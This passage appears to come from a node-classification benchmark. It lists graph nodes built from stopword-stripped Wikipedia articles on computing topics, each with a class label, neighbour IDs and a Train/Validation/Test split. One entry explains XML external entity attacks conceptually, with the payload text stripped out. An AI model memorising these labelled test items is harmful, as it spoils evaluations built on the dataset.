    "text": "ARJ:arj arj archived robert jung software tool designed robert k. jung creating high-efficiency compressed file archives arj currently version 2.86 dos 3.20 microsoft windows supports 16-bit 32-bit 64-bit intel architectures arj one two mainstream archivers dos windows early mid-1990s pkzip competition parts arj covered generally arj less popular pkzip niche market bbs era warez scene largely due arj creation handling multi-volume archives archives split smaller files suitable dial-up transfers floppy distribution robust pkzip arj compressed files filename extension .arj unpacked various tools arj software exists free software re-implementation tool software 7-zip zipeg winrar also unpack .arj files mac exists standalone utilities dearj unarjmac",
    "neighbors": [
      6022,
      1801,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      3114,
      10027,
      2095,
      4406,
      6713,
      10817,
      11076,
      1352,
      4296,
      3659,
      10317,
      4174,
      10575,
      4561,
      722,
      3804,
      7422,
      1631,
      3296,
      9953,
      5858,
      11614,
      6759,
      5096,
      7529,
      6506,
      4459,
      10857,
      237,
      1646,
      7667,
      6389,
      4089,
      6908,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 2756,
    "label": 4,
    "text": "Automated_information_systems_security:automated information systems security telecommunication automated information systems security comprises measures controls ensure confidentiality integrity availability information processed stored automated information systems unauthorized disclosure modification destruction may accidental intentional automated information systems security includes consideration computer hardware software functions characteristics features operational procedures accountability procedures access controls central computer facility remote computer terminal facilities management constraints physical structures devices computers transmission lines power sources personnel communications controls needed provide acceptable level risk automated information system data information contained system automated information systems security also includes totality security safeguards needed provide acceptable protection level automated information system data handled automated information system information security automated information systems security synonym computer security",
    "neighbors": [
      2737,
      7188,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 2757,
    "label": 1,
    "text": "BaseX:basex basex native light-weight xml database management system xquery processor developed community project github specialized storing querying visualizing large xml documents collections basex platform-independent distributed permissive free software license contrast document-oriented databases xml databases provide support standardized query languages xpath xquery basex highly conformant world wide web consortium w3c specifications official update full text extensions included gui enables users interactively search explore analyze data evaluate xpath/xquery expressions realtime i.e. user types basex uses tabular representation xml tree structures store xml documents database acts container single document collection documents xpath accelerator encoding scheme staircase join operator taken inspiration speeding xpath location steps additionally basex provides several types indices improve performance path operations attribute lookups text comparisons full-text searches basex started christian grün university konstanz 2005 2007 basex went open source bsd-licensed since basex server pure java 1.7 application thus runs system provides suitable java implementation tested windows mac os x linux openbsd particular packages available debian ubuntu",
    "neighbors": [
      9828,
      5677,
      10453,
      6775,
      2456,
      124,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 2758,
    "label": 4,
    "text": "XML_external_entity_attack:xml external entity attack xml external entity attack type attack application parses xml input attack occurs xml input containing reference external entity processed weakly configured xml parser attack may lead disclosure confidential data denial service server side request forgery port scanning perspective machine parser located system impacts xml 1.0 standard defines structure xml document standard defines concept called entity storage unit type different types entities external general/parameter parsed entity often shortened external entity access local remote content via declared system identifier system identifier assumed uri dereferenced accessed xml processor processing entity xml processor replaces occurrences named external entity contents dereferenced system identifier system identifier contains tainted data xml processor dereferences tainted data xml processor may disclose confidential information normally accessible application similar attack vectors apply usage external dtds external style sheets external schemas etc included allow similar external resource inclusion style attacks attacks include disclosing local files may contain sensitive data passwords private user data using file schemes relative paths system identifier since attack occurs relative application processing xml document attacker may use trusted application pivot internal systems possibly disclosing internal content via http requests launching csrf attack unprotected internal services situations xml processor library vulnerable client-side memory corruption issues may exploited dereferencing malicious uri possibly allowing arbitrary code execution application account attacks access local resources may stop returning data possibly impacting application availability many threads processes released note application need explicitly return response attacker vulnerable information disclosures attacker leverage dns information exfiltrate data subdomain names dns server control examples testing xml injection owasp-dv-008 xml version= 1.0 encoding= iso-8859-1 php expect module loaded remote code execution may possible modified payload xml version= 1.0 encoding= iso-8859-1 since entire xml document communicated untrusted client usually possible selectively validate escape tainted data within system identifier dtd therefore xml processor configured use local static dtd disallow declared dtd included xml document",
    "neighbors": [
      8930,
      899,
      8644,
      522,
      5682,
      10492,
      5404,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 2759,
    "label": 2,
    "text": "GeeksPhone_Revolution:geeksphone revolution geeksphone revolution smartphone released geeksphone january 2014 uses x86 architecture pci bus instead arm architecture capable running either android firefox os lacks dual boot facility",
    "neighbors": [
      1776,
      1083,
      7492,
      2259
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2760,
    "label": 5,
    "text": "Instant_Messaging_and_Presence_Protocol:instant messaging presence protocol instant messaging presence protocol impp ietf working group created purpose developing architecture simple instant messaging presence awareness/notification created 1999-02-25 concluded 2004-09-08",
    "neighbors": [
      10242,
      5251,
      3460,
      5382,
      4746,
      1036,
      11408,
      3610,
      3228,
      10271,
      3105,
      9511,
      1962,
      9519,
      8758,
      1467,
      6208,
      1218,
      6982,
      6855,
      1738,
      2892,
      3284,
      4318,
      3812,
      4068,
      6628,
      9572,
      3959,
      7928,
      10748
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2761,
    "label": 3,
    "text": "Green_Hills_Software:green hills software green hills software privately owned company builds operating systems programming tools embedded systems firm founded 1982 dan o'dowd carl rosenberg world headquarters santa barbara california green hills software wind river systems enacted 99-year contract cooperative peers embedded software engineering market throughout 1990s relationship ending series lawsuits throughout early 2000s resulted opposite parting ways whereupon wind river devoted publicly embrace linux open-source software green hills initiated public relations campaign decrying use issues national security 2008 green hills integrity-178 rtos first system certified national information assurance partnership niap composed national security agency nsa national institute standards technology nist evaluation assurance level eal 6+ november 2008 announced commercialized version integrity 178-b available sold private sector integrity global security subsidiary green hills software march 27 2012 contract announced green hills software nintendo designates multi official integrated development environment toolchain nintendo licensed developers program wii u video game console february 25 2014 announced operating system integrity chosen urban aeronautics airmule integrity posix real-time operating system rtos integrity variant named integrity-178b certified common criteria evaluation assurance level eal 6+ high robustness november 2008 micro velosity stylized µ-velosity real-time microkernel resource-constrained devices green hills produces compilers programming languages c c++ fortran ada cross-platform 32- 64-bit microprocessors including arm blackfin coldfire mips powerpc superh starcore x86 v850 xscale multi integrated development environment ide programming languages c c++ embedded c++ ec++ ada aimed embedded engineers timemachine set tools optimizing debugging c c++ software timemachine introduced 2003 supports reverse debugging feature later also became available free gdb 7.0 debugger 2009",
    "neighbors": [
      2179,
      7561,
      8720,
      1298,
      7187,
      9366,
      6300,
      8861,
      1952,
      428,
      11180,
      7983,
      4914,
      1462,
      823,
      11446,
      5049,
      10170,
      10813,
      10945,
      7234,
      1350,
      8904,
      2761,
      9931,
      7887,
      10962,
      6486,
      5976,
      9176,
      1761,
      5865,
      5612,
      9964,
      499,
      5363,
      11123,
      3960,
      8700,
      2045,
      5247
    ],
    "mask": "Test"
  },
  {
    "node_id": 2762,
    "label": 3,
    "text": "Vmlinux:vmlinux linux systems codice_1 statically linked executable file contains linux kernel one object file formats supported linux includes elf coff a.out codice_1 file might required kernel debugging symbol table generation operations must made bootable used operating system kernel adding multiboot header bootsector setup routines traditionally unix platforms called kernel image codice_3 development virtual memory kernels supported feature given codice_4 prefix differentiate name codice_1 mutation vmunix codice_6 letter codice_7 end denotes compressed example gzipped traditionally kernel located root directory filesystem hierarchy however bootloader must use bios drivers access hard disk limitations i386 systems meant first 1024 cylinders hard disk addressable overcome linux distributors encouraged users create partition beginning drives specifically storing bootloader kernel related files grub lilo syslinux common bootloaders convention partition mounted filesystem hierarchy codice_8 later standardised filesystem hierarchy standard fhs requires linux kernel image located either codice_9 codice_8 although technical restriction enforcing traditionally creating bootable kernel image kernel also compressed using gzip since linux 2.6.30 using lzma bzip2 requires small decompression stub included resulting image stub decompresses kernel code systems printing dots console indicate progress continues boot process support lzo lz4 compression later added decompression routine negligible factor boot time prior development bzimage size constraints architectures notably i386 extremely limiting making compression necessity sparc architecture vmlinux file compressed using simple gzip silo boot loader transparently decompresses gzipped images filename bootable image important many popular distributions use vmlinuz linux kernel matured size kernels generated users grew beyond limits imposed architectures space available store compressed kernel code limited bzimage big zimage format developed overcome limitation splitting kernel discontiguous memory regions bzimage compressed using gzip linux 2.6.30 introduced algorithms although popular misconception codice_11 prefix means bzip2 compression used bzip2 package often distributed tools prefixed codice_11 codice_13 codice_14 etc case bzimage file specific format contains concatenated codice_15 codice_16 codice_17 codice_18 codice_18 contains gzipped vmlinux file data section elf see compressed/makefile piggy.o source files mentioned codice_20 script codice_21 found codice_22 kernel sources decompresses kernel image distributions e.g red hat clones may come codice_23 rpm contains codice_1 file matching kernel rpm typically gets installed codice_25 codice_26 elf header x86-64 gentoo 2.6.29 executable kernel image readelf -h vmlinux elf header",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      237,
      9455,
      10482,
      9972,
      2294,
      8439,
      2809,
      4360,
      1801,
      1291,
      4367,
      11539,
      792,
      10016,
      295,
      11568,
      823,
      6968,
      7992,
      3386,
      318,
      4929,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      1399,
      8573,
      1406,
      9597,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      4561,
      2529,
      6625,
      8676,
      2021,
      5096,
      1513,
      1515,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 2763,
    "label": 2,
    "text": "NepaLinux:nepalinux nepalinux debian morphix-based linux distribution focused desktop usage nepali language computing contains applications desktop users openoffice.org nepali gnome kde desktops nepali input method editor development distribution nepalinux done madan puraskar pustakalaya version 1.0 produced part pan localization project support international development research centre idrc canada nepalinux effort promoting free open-source software nepal october 2007 nepalinux joint recipient association progressive communications annual apc foss prize",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      5067,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 2764,
    "label": 3,
    "text": "Zen+:zen+ zen+ codename amd successor zen microarchitecture first released april 2018 powering second generation ryzen processors known ryzen 2000 mainstream desktop systems threadripper 2000 high-end desktop setups zen+ uses globalfoundries 12nm fabrication process optimization 14nm process used zen minor design rule changes means die sizes zen zen+ identical amd chose increase amount empty space individual smaller transistors improve power efficiency reduce thermal density rather design entirely new floor-plan physically smaller die process optimizations allowed zen+ achieve higher clock speeds lower power consumption zen products though minor revisions compared zen microarchitecture known changes microarchitecture include improved clock speed regulation response workload reduced cache memory latencies increased cache bandwidth better ddr4 sdram memory support zen+ also supports improvements per-core clocking features based core utilization cpu temperatures changes core utilization temperature power algorithms branded precision boost 2 xfr2 extended frequency range 2 evolutions first-generation technologies zen zen xfr gave additional 50 200 mhz clock speed increase 25 mhz increments maximum precision boost clocks zen+ xfr2 longer listed separate clock modifier instead xfr temperature power clock monitoring logic feeds precision boost 2 algorithm adjust clocks power consumption opportunistically dynamically ultimately changes zen+ resulted 3 improvement ipc zen conjunction 6 higher clock speeds resulted 10 overall increase performance",
    "neighbors": [
      3586,
      8322,
      5380,
      9092,
      9475,
      6151,
      8327,
      10375,
      5645,
      398,
      6033,
      9369,
      7963,
      2719,
      9122,
      5541,
      11047,
      2088,
      2094,
      11183,
      1329,
      6705,
      10675,
      9400,
      833,
      6978,
      7234,
      9541,
      11080,
      7247,
      9551,
      977,
      5329,
      7122,
      9427,
      473,
      9435,
      5859,
      7783,
      1260,
      1005,
      5356,
      9582,
      9964,
      1137,
      10734,
      2549,
      11130,
      4603,
      3070
    ],
    "mask": "Train"
  },
  {
    "node_id": 2765,
    "label": 4,
    "text": "Loggly:loggly solarwinds loggly cloud-based log management analytics service provider based san francisco california jon gifford raffael marty kord campbell founded company 2009 charlie oppenheimer ceo loggly announced acquisition solarwinds part solarwinds cloud division brands january 8 2018 2009 jon gifford raffael marty kord campbell founded loggly assist companies solving operational issues app47 mobile application management provider partnered loggly september 2012 company chose loggly software-as-a-service saas deployment option september 2013 loggly released generation 2 updated version service update included log collection standard syslog protocols graphical web interface allowed users use point-and-click process find log events generate charts month loggly completed 10.5 million funding round led cisco data collective trinity ventures true ventures matrix partners also participated round october 2014 company announced 15 million series c funding round led harmony partners matrix partners trinity ventures cisco data collective true ventures also participated funding round raised loggly total investment funding 33.4 million company released loggly dynamic field explorer new user experience aims reduce time developers spend identifying troubleshooting problems month january 8 2018 company announced part solarwinds loggly headquartered san francisco california company 54 employees 10,000 customers october 2017 loggly records log data device reports real-time management platform trend data loggly cloud-based log management service provider require use proprietary software agents collect log data service uses open source technologies including elasticsearch apache lucene 4 apache kafka",
    "neighbors": [
      11429,
      4234,
      6834,
      11542,
      6458,
      3614
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2766,
    "label": 1,
    "text": "Biobase_(company):biobase company biobase international bioinformatics company headquartered wolfenbüttel germany focus generation maintenance licensing databases field molecular biology related software platforms history company founded 1997 spin-off german research centre biotechnology gbf braunschweig germany known today helmholtz research centre infection research *the founders scientists gbf research group bioinformatics headed time edgar wingender company managed michael tysiak ceo/cfo frank schacherer coo citation needed • company original product transfac database platform description analysis gene regulatory events networks subsequently complemented number smaller databases relevant aspects gene regulation early signaling pathway database transpath transpath constituted earliest signaling pathway database alongside cell signaling network database csndb curated t. takai national institute health sciences nihs tokyo • 1999 2000 employees till august 2017 biobase group new high-tech enterprise focusing development production management scientific equipment vitro diagnosis ivd instrument reagent • biobase group certificates including iso9001 iso13485 iso 14001 sgs ce nsf en fda etc • biobase group always adheres mission “ service health future ” promotes company ’ culture vigorously providing high quality products good service biobase would like establish win-win business cooperation distributors world end 1999 biobase acquired venture capital imh funds managed triginta capital mbg hannover 2007 tbg 2002 intec w g tokyo japan invested company remained shareholder 2005 early 2005 company acquired databases produced incyte wilmington delaware usa operated time incyte subsidiary proteome inc beverly early flagship proteome yeast proteome database ypd complemented number similar databases latest achievement acquisition human proteome survey database humanpsd biobase gmbh three fully owned daughter companies biobase corporation beverly/massachusetts usa since 2005 biobase databases india pvt ltd. bangalore india since 2006 biobase japan k.k yokohama japan since 2007 company databases provide manually curated content collected structured peer-reviewed scientific primary publications biobase knowledge library bkl integrated database comprising following modules addition biobase developed explain system biological interpretation gene expression proteomics data integrated functional promoter pathway analysis gene regulation portal offers number earlier revisions company products free charge users non-profit organizations number third-party products also distributed biobase addition products biobase offers knowledge process outsourcing kpo services may comprise development population customized databases specific contents systematic analyses gene expression data biobase member following publicly funded research consortia first two coordinated biobase alexander kel addition biobase entered research partnerships",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 2767,
    "label": 3,
    "text": "Spatial_Archive_and_Interchange_Format:spatial archive interchange format spatial archive interchange format saif pronounced safe defined early 1990s self-describing extensible format designed support interoperability storage geospatial data saif dataset saif two major components together define saiftalk first class syntax notation csn data definition language used define dataset schema second object syntax notation osn data language used represent object data adhering schema csn osn contained physical file along directory beginning file use ascii text straightforward syntax csn osn ensure parsed easily understood directly users developers saif dataset .saf .zip extension compressed using zip archive format schema definition saif defines 285 classes including enumerations class syntax notation covering definitions high-level features geometric types topological relationships temporal coordinates relationships geodetic coordinate system components metadata considered forming base schema using csn user defines new schema describe features given dataset classes belonging new schema defined csn subclasses existing saif classes new enumerations foreststand :myschema example could defined attributes including age species etc foreststand :myschema specified subclass geographicobject feature defined saif standard user defined classes must belong schema one defined user previously existing different schemas exist dataset objects defined one schema reference specified another inheritance saif supports multiple inheritance although common usage involved single inheritance object referencing object referencing used means breaking large monolithic structures significantly allow objects defined referenced number times section geometry land-water interface could define part coastline well part municipal boundary part marine park boundary geometric feature defined given object reference used geometry coastline municipality marine park specified multimedia multimedia objects also objects saif dataset referenced accordingly example image sound files associated given location could included primary advantage saif inherently extensible following object oriented principles meant data transfers one gis environment another need follow lowest common denominator two systems instead data could extracted dataset defined first gis transformed intermediary i.e. semantically rich saif model transformed model format applicable second gis notion model model transformation deemed realistic object oriented approach recognized scripts carry transformations could fact add information content safe software developed feature manipulation engine fme large measure express purpose supporting transformations fmebc freely available software application supported wide range transformations using saif hub fme developed commercial offering intermediary could held memory instead saif dataset saif project established means addressing interoperability different geographic information systems exchange formats particular prominence time included digest digital geographic information exchange standard sdts spatial data transfer specification later accepted spatial data transfer standard considered inflexible difficult use consequently government british columbia decided develop saif put forward national standard canada saif became canadian national standard 1993 approval canadian general standards board last version saif published january 1995 designated cgis-saif canadian geomatics interchange standard spatial archive interchange format formal definition release 3.2 issue can/cgsb-171.1-95 catalogue number p29-171-001-1995e work saif modeling paradigm csn classes carried principally mark sondheim henry kucera peter friesen british columbia government time dale lutz murray safe software developed object syntax notation reader writer software became part feature manipulation engine saif brought attention michael stonebraker kenn gardels university california berkeley working initial version open geospatial interoperability specification ogis first efforts became open geospatial consortium ogc series 18 submissions iso sql multimedia working group also helped tie saif original iso work geospatial features today saif historical interest significant precursor geography markup language formative element development widely used feature manipulation engine sondheim m. k. gardels k. buehler 1999 gis interoperability pp 347–358 geographical information systems second edition volume 1 edited paul a. longley michael f. goodchild david j. magurie davide w. rhind sondheim m. p. friesen d. lutz d. murray 1997 spatial archive interchange format saif spatial database transfer standards 2 characteristics assessing standards full descriptions national international standards world edited moellering h. hogan r. elsevier netherlands surveys resource mapping branch spatial archive interchange format release 3.2 formal definition 1995 also release 3.1 1994 3.0 1993 2.0 1992 1.0 1991 0.1 1990 surveys resource mapping branch british columbia ministry environment lands parks 258p also published canadian general standards board can/cgsb-171.1-95 available request geobc service desk http //www.ilmb.gov.bc.ca/geobc/servicedesk.html",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2768,
    "label": 9,
    "text": "Oracle_Media_Objects:oracle media objects oracle media objects formerly oracle card software development tool developing multi-media applications functionality appearance similar apple computer hypercard program originated plus 1989 clone hypercard published format verlag added several highly-requested features plus purchased spinnaker software ported windows nt os/2 presentation manager becoming first cross-platform hypermedia solution 1994 plus purchased objectplus focussed windows version renaming winplus also licensed system oracle used basis oracle card first released 1991 oracle card essentially redistribution plus runtime engine along external libraries establishing connections rdbms engines oracle db2 oracle card stacks could execute queries associate results native variables making oracle card one first rdbms application development environments support cross-platform development years later oracle acquired original plus source code format verlag developed become oracle media objects omo omo n't last long development ceasing version 1.1.2 omo used oracle position video demand market commercially products built using tool amongst secret century series cd-roms published voyager company inside independence day aces entertainment omo unique distinction stacks cross-platform also external libraries xcmds purpose small subset mac os memory management commands handles ported platforms addition omo sported modular design every type object actually implemented plugin file objects folder omo object types included standard controls available hypercard clones time buttons text fields draw paint graphics well complex controls like spreadsheet field non-control items could placed card invisible runtime like timers could scheduled send messages specified time oracle card primary value lay fact time oracle product offer gui support microsoft windows therefore sometimes included sales pitches potential clients virtue fact windows becoming increasingly popular desktop large corporations showed customers oracle serious windows current product platform oracle primary application development tool oracle forms 3 character-based run microsoft windows although could run dos window natively dos without windows oracle desperately working developing upgrade oracle forms 4 gui features development behind schedule oracle card primarily used stop gap demonstration product oracle forms become available handful large clients including u.s postal service known developed applications oracle card internal use oracle card broad commercial success development platform despite fact feature set surpassed apple hypercard nearly every respect platform support database connectivity vector graphics support better color support faster performance richer plug-in architecture eventually oracle forms 4.0 released meaning support windows longer exclusive domain oracle card oracle customers tended interested standard forms-based database applications rather sorts multimedia applications possible create oracle card successor omo oracle eventually threw full weight behind oracle forms 4.0 casting oracle card/omo oblivion however oracle card team led two oracle employees gone form successful technology companies marc benioff founder salesforce.com evan goldberg founder netsuite",
    "neighbors": [
      1539,
      10340,
      11171,
      4486,
      6377,
      10090,
      1259,
      4844,
      7983,
      8976,
      1592,
      3167
    ],
    "mask": "Train"
  },
  {
    "node_id": 2769,
    "label": 2,
    "text": "ClanLib:clanlib clanlib video game sdk supporting microsoft windows macos linux partial support mobile platforms full hardware accelerated graphics support opengl also software renderer clanlib also helps playing sound using vorbis mikmod libraries classes collision detection guis xml networking things may helpful game programmer earliest known public release 1999 version 0.1.18 introduction c++ game programming published june 2007 dedicates chapter learn use clanlib library make 2d games also game programming python lua ruby published december 2003 chapter using clanlib together ruby",
    "neighbors": [
      5451,
      6797,
      7983,
      10480,
      4182,
      823,
      3734,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2770,
    "label": 0,
    "text": "Eagles_Guidelines:eagles guidelines eagles guidelines provide guidance markup used text corpora particularly identifying features relevant computational linguistics lexicography expert advisory group language engineering standards eagles initiative european commission within dg xiii linguistic research engineering programme numerous well-known companies research centres universities professional bodies across european union collaborate aegis ec dgxiii produce eagles guidelines set recommendations de facto standards good practice areas language engineering eagles initiative coordinated consorzio pisa ricerche pisa italy eagles aims accelerate provision standards",
    "neighbors": [
      1890,
      7599
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2771,
    "label": 3,
    "text": "Miracle_Warriors:_Seal_of_the_Dark_Lord:miracle warriors seal dark lord miracle warriors seal dark lord known japan role-playing video game released initially japanese pc-88 ported various systems including sega master system version released north america screen game consists four parts lower left character statistics lists characters party character life bar experience bar single character gain experience hitting enemies experiences full new level reached experience bar emptied bars extended resulting maximum life character experience needed gain new level lower right statistics entire party example amount money upper right section varies screen screen traveling world town maze map shown player navigate player invokes main menu shown battle shows battle menu upper left section also varies traveling world cave shows party members surroundings battle shows foe town shows persons player talk dialogue player encounters enemy screen switches battle mode battle mode player choose one character attack per turn character also subjected attack enemy unless enemy uses spell attacks multiple players enemies use flame spells attack party members sleep spells put multiple party members sleep every time party member put sleep take damage wake put sleep many times battle taking damage time fall asleep every party member sleeping enemy use flame spell attack every party member alternative attack player several options including talking retreating using magical item casting spell enemies respond talking give hints currency game guilder used buy items heal players defeated enemies also yield fangs proof valor battle fangs used buy exclusive items traded villages guilders defeating enemies also increase decrease player character points fame killing monsters usually increases player fame killing good characters example merchants decreases player fame certain amount character points required enter certain villages game takes place world five lands spread three continent came elaborate grid-format map noting areas interest game four types land plain forest mountains desert enemies become dangerous different types land plains safest terrain cross continents separated oceans storming sea around last continent ship required sail oceans special ship needed cross storming sea helmed someone pirate blood veins throughout world several towns towns smiths repair weapons armor healers heal sell herbs shops sell weapons armor towns provide information one person every town buys fangs fifty guilders also villages serve special purposes selling ships special magical items several caves exist world house guardians protect mystical armors legend finally also various castles visited get weapons legends kings impressed enough demon queen terarin テラリン returned stolen golden seal opened pandora passage letting loose dark creatures world young hero tasked king restore peace world must step footsteps ancestor iason fought seal demoness another dimension finish job bring end terarin evil hero must enlist aid three companions guy warrior medi amazon treo pirate called turo english manual find three keys terarin lair underground temple defeat also need find set ancient mystical weapons armor miracle warriors master system received mixed mostly positive reviews including rated 40 games machine 77 sega power 80 tilt game followed sequel titled wings arugisu アルギースの翼 released msx2 kogado 1988",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2772,
    "label": 5,
    "text": "Hybrid_automatic_repeat_request:hybrid automatic repeat request hybrid automatic repeat request hybrid arq harq combination high-rate forward error-correcting coding arq error-control standard arq redundant bits added data transmitted using error-detecting ed code cyclic redundancy check crc receivers detecting corrupted message request new message sender hybrid arq original data encoded forward error correction fec code parity bits either immediately sent along message transmitted upon request receiver detects erroneous message ed code may omitted code used perform forward error correction fec addition error detection reed–solomon code fec code chosen correct expected subset errors may occur arq method used fall-back correct errors uncorrectable using redundancy sent initial transmission result hybrid arq performs better ordinary arq poor signal conditions simplest form comes expense significantly lower throughput good signal conditions typically signal quality cross-over point simple hybrid arq better basic arq better simplest version harq type harq adds ed fec information message prior transmission coded data block received receiver first decodes error-correction code channel quality good enough transmission errors correctable receiver obtain correct data block channel quality bad transmission errors corrected receiver detect situation using error-detection code received coded data block rejected re-transmission requested receiver similar arq sophisticated form type ii harq message originator alternates message bits along error detecting parity bits fec parity bits first transmission received error free fec parity bits never sent also two consecutive transmissions combined error correction neither error free understand difference type type ii hybrid arq consider size ed fec added information error detection typically adds couple bytes message incremental increase length fec hand often double triple message length error correction parities terms throughput standard arq typically expends percent channel capacity reliable protection error fec ordinarily expends half channel capacity channel improvement standard arq transmission must received error free given transmission error detection pass type ii hybrid arq first transmission contains data error detection different standard arq received error free done data received error second transmission contain fec parities error detection received error free done received error error correction attempted combining information received transmissions type hybrid arq suffers capacity loss strong signal conditions type ii hybrid arq fec bits transmitted subsequent re-transmissions needed strong signal conditions type ii hybrid arq performs good capacity standard arq poor signal conditions type ii hybrid arq performs good sensitivity standard fec practice incorrectly received coded data blocks often stored receiver rather discarded re-transmitted block received two blocks combined called hybrid arq soft combining dahlman et al. p. 120 possible two given transmissions independently decoded without error may happen combination previously erroneously received transmissions gives us enough information correctly decode two main soft combining methods harq several variants two main methods exist example partial chase combining subset bits original transmission re-transmitted partial incremental redundancy systematic bits always included re-transmission self-decodable example incremental redundancy harq hsdpa data block first coded punctured 1/3 turbo code transmission coded block usually punctured i.e fraction coded bits chosen sent puncturing pattern used transmission different different coded bits sent time although hsdpa standard supports chase combining incremental redundancy shown incremental redundancy almost always performs better chase combining cost increased complexity harq used stop-and-wait mode selective repeat mode stop-and-wait simpler waiting receiver acknowledgment reduces efficiency thus multiple stop-and-wait harq processes often done parallel practice one harq process waiting acknowledgment another process use channel send data forward error correction codes used harq scheme besides turbo codes e.g extended irregular repeat-accumulate eira code efficiently-encodable rate-compatible e2rc code low-density parity-check codes harq used hsdpa hsupa provide high speed data transmission downlink uplink respectively mobile phone networks umts ieee 802.16-2005 standard mobile broadband wireless access also known mobile wimax also used evolution-data optimized lte wireless networks type hybrid arq used itu-t g.hn high-speed local area network standard operate data rates 1 gbit/s existing home wiring power lines phone lines coaxial cables g.hn uses crc-32c error detection ldpc forward error correction selective repeat arq",
    "neighbors": [
      2640,
      4691,
      2203,
      2752
    ],
    "mask": "None"
  },
  {
    "node_id": 2773,
    "label": 4,
    "text": "Computer_liquidator:computer liquidator computer liquidator buys computer technology related equipment longer required one company resells flips another company computer liquidators agents act computer recycling electronic recycling business several reasons companies sell liquidate used information technology i.t equipment bankruptcy downsizing expanding technological advancement technological advancement common reason equipment longer performing tasks required usually rendered obsolete advanced technology coming market used obsolete technology often referred electronic waste equipment designated outdated one company still viable another company whose operations may require advanced solutions often information technology audit performed help company decide equipment needs updating requirements computer liquidation sustainable solution environmentally friendly rapid technology change low initial cost planned obsolescence resulted fast-growing surplus computers electronic components around globe purpose computer liquidators keep many computers electronic parts landfills newer better technology replaces hardware ever-increasing speed amount technical trash increases technology replaced speed hardware changes innovates last years follows degree moore law predictions made every landfill would soon overflowing discarded computer screens computers along associated equipment keyboards mouses hardware associated use internet.most electronic waste sent landfills incinerated releases toxic materials lead mercury cadmium soil groundwater atmosphere thus negative impact environment best liquidating companies clearly outlined policies regarding disposal dangerous substances often issue information technology act liquidation avoids possible toxins pollution comes putting electronic waste landfills also avoids extra costs go recycling example new york passed law 2015 banned putting electronic devices landfills waste facilities rural counties forced either turn people away eat cost recycling cathode ray tubes outside new york city counties spending 6 million 10 million year deal problem according stephen acquario executive director new york state association counties option liquidation actually incentivizes people get rid electronic waste safer way since recycling actually costs owner money cases people would rather throw avoid recycling fee computer liquidators effectively create secondary market meet demand looking cheaper solution require cutting edge technology important note equipment liquidated ranges new technology old technology relatively lower price secondary market equipment companies may even purchase tech devices secondary market use backups stocking equipment preemptively replacement always hand event trouble product availability also another reason buyers buy market manufacturers generally refresh product line every 12 24 months typically liquidating older products networking hardware often see service lives five years resellers computer liquidators might carry products upwards decade old end users use particular product may find much easier cheaper add/replace older device rather take costs business disruptions knowledge gaps occur upgrading new products newer products adopted used equipment inevitably liquidated thrown sold back creates robust marketplace typically three agents computer liquidation process seller computer liquidator buyer sellers companies bankrupt need sell assets companies downsizing expanding companies upgrading technology usually companies looking sell equipment first conduct information technology audit review systems equipment process generally fueled supply side computer liquidators rely available market liquidate resell thus nearly always exists shortage buyers oceantech example buys computers laptops tablets electronics companies longer need technology conduct certified data destruction appliances technicians perform thorough check systems confirm devices functional stored warehouse certain parts like motherboard hard drives able used stripped machine put warehouse store devices parts resold smaller companies places like school districts need products companies involved computer liquidation business also heavily involved computer electronic recycling industry takes similar process disassembling testing process theoretically benefits ends exchange seller gets money equipment longer needs buyer gets cheap equipment necessary work number organizations sprung provide technical guidelines handling dealing ewaste",
    "neighbors": [
      9499,
      2273,
      7579
    ],
    "mask": "Test"
  },
  {
    "node_id": 2774,
    "label": 9,
    "text": "Joy_(programming_language):joy programming language joy programming language computer science purely functional programming language produced manfred von thun la trobe university melbourne australia joy based composition functions rather lambda calculus turned many similarities forth due design sort parallel evolution convergence also inspired function-level programming style backus fp joy unusual except function-level programming languages esoteric ones unlambda lack lambda operator therefore lack formal parameters illustrate common example square function might defined imperative programming language c variable x formal parameter replaced actual value squared function called functional language scheme function could defined different many ways still uses formal parameter x way joy square function defined joy everything function takes stack argument returns stack result instance numeral 5 represent integer constant instead short program pushes number 5 onto stack square function makes copy top element multiplies two top elements stack leaving square original top element top stack need formal parameter makes joy concise illustrated definition quicksort binrec one joy many recursive combinators implementing binary recursion expects four quoted programs top stack represent joy meaning function homomorphism syntactic monoid onto semantic monoid syntactic relation concatenation symbols maps directly onto semantic relation composition functions homomorphism rather isomorphism onto one-to-one symbol one meaning sequences symbols meaning e.g dup 2 joy concatenative programming language concatenation two programs denotes composition functions denoted two programs library routines mirror iso c though 